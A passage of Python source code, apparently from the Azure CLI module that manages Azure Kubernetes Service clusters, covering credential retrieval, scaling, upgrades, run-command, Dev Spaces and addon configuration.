if random_agent_pool.vnet_subnet_id != "":
add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False, context_name=None, public_fqdn=False,
credential_format=None):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if credential_format:
credential_format = credential_format.lower()
if admin:
raise InvalidArgumentValueError("--format can only be specified when requesting clusterUser credential.")
if admin:
if cmd.cli_ctx.cloud.profile == "latest":
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name)
else:
if cmd.cli_ctx.cloud.profile == "latest":
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType, credential_format)
else:
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name)
# Check if KUBECONFIG environmental variable is set
# If path is different than default then that means -f/--file is passed
# in which case we ignore the KUBECONFIG variable
# KUBECONFIG can be colon separated. If we find that condition, use the first entry
if "KUBECONFIG" in os.environ and path == os.path.join(os.path.expanduser('~'), '.kube', 'config'):
path = os.environ["KUBECONFIG"].split(":")[0]
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError(
'usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError(
'usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=service_principal, secret=client_secret
)
return sdk_no_wait(no_wait,
client.begin_reset_service_principal_profile,
resource_group_name,
name, service_principal_profile)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.begin_reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None,
uptime_sla=False,
no_uptime_sla=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
windows_admin_password=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
disable_local_accounts=False,
enable_local_accounts=False,
yes=False,
no_wait=False,
enable_public_fqdn=False,
disable_public_fqdn=False,
enable_azure_rbac=False,
disable_azure_rbac=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
tags=None,
nodepool_labels=None,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
aks_custom_headers=None):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
# decorator pattern
from .decorator import AKSUpdateDecorator
aks_update_decorator = AKSUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=raw_parameters,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
try:
# update mc profile
mc = aks_update_decorator.update_default_mc_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real managed cluster
return aks_update_decorator.update_mc(mc)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
client,
resource_group_name, name,
kubernetes_version='',
control_plane_only=False,
node_image_only=False,
no_wait=False,
yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(True, agent_pool_client,
resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
agent_profile.creation_data = None
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name,
snapshot_id=None):
headers = {}
if snapshot_id:
headers["AKSSnapshotId"] = snapshot_id
return sdk_no_wait(
no_wait,
client.begin_upgrade_node_image_version,
resource_group_name,
cluster_name,
nodepool_name,
headers=headers)
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not command_string:
raise ValidationError('Command cannot be empty.')
RunCommandRequest = cmd.get_models('RunCommandRequest', resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
request_payload = RunCommandRequest(command=command_string)
request_payload.context = _get_command_context(command_files)
# if this cluster have Azure AD enabled, we should pass user token.
# so the command execution also using current user identity.
# here we aquire token for AKS managed server AppID (same id for all cloud)
if mc.aad_profile is not None and mc.aad_profile.managed:
request_payload.cluster_token = _get_dataplane_aad_token(
cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")
commandResultFuture = client.begin_run_command(
resource_group_name, name, request_payload, polling_interval=5, retry_total=0)
return _print_command_result(cmd.cli_ctx, commandResultFuture.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
if not command_id:
raise ValidationError('CommandID cannot be empty.')
commandResult = client.get_command_result(
resource_group_name, name, command_id)
return _print_command_result(cmd.cli_ctx, commandResult)
def _print_command_result(cli_ctx, commandResult):
# cli_ctx.data['safe_params'] contains list of parameter name user typed in, without value.
# cli core also use this calculate ParameterSetName header for all http request from cli.
if (cli_ctx.data['safe_params'] is None or
"-o" in cli_ctx.data['safe_params'] or
"--output" in cli_ctx.data['safe_params']):
# user specified output format, honor their choice, return object to render pipeline
return commandResult
# user didn't specified any format, we can customize the print for best experience
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(
f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, "
f"finished at {commandResult.finished_at} "
f"with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
# *-ing state
print(f"{colorama.Fore.BLUE}command is in : {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return None
def _get_command_context(command_files):
if not command_files:
return ""
filesToAttach = {}
# . means to attach current folder, cannot combine more files. (at least for now)
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise ValidationError(
". is used to attach current folder, not expecting other attachements.")
if os.path.isfile(file):
# for individual attached file, flatten them to same folder
filesToAttach[file] = os.path.basename(file)
else:
raise ValidationError(
f"{file} is not valid file, or not accessable.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
# zipFile.printdir() // use this to debug
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
def _get_dataplane_aad_token(cli_ctx, serverAppId):
# this function is mostly copied from keyvault cli
return Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)[0][2].get('accessToken')
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
:param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(
name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError(
"Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(
name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise ValidationError('The confcom addon is already enabled for this managed cluster.',
recommendation='To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise AzureInternalError(
'The open-service-mesh addon is already enabled for this managed '
'cluster.\n To change open-service-mesh configuration, run '
'"az aks disable-addons -a open-service-mesh -n {} -g {}" '
'before enabling it again.'
.format(name, resource_group_name))
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise ArgumentUsageError(
'The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" ' # pylint: disable=line-too-long
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
aci_subnet_name=None,
vnet_subnet_id=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
rotation_poll_interval=None,):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id,
CONST_MONITORING_USING_AAD_MSI_AUTH: enable_msi_auth_for_monitoring})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"}
)
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error(
"Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (
ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
for key in list(addon.config):
if (key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and
key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID):
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID]
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError(
'Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(
workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(
unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cmd,
assignee,
acr_name_or_id,
subscription_id,
detach=False,
is_service_principal=True):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cmd.cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cmd, assignee, registry.id, detach, is_service_principal)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cmd.cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
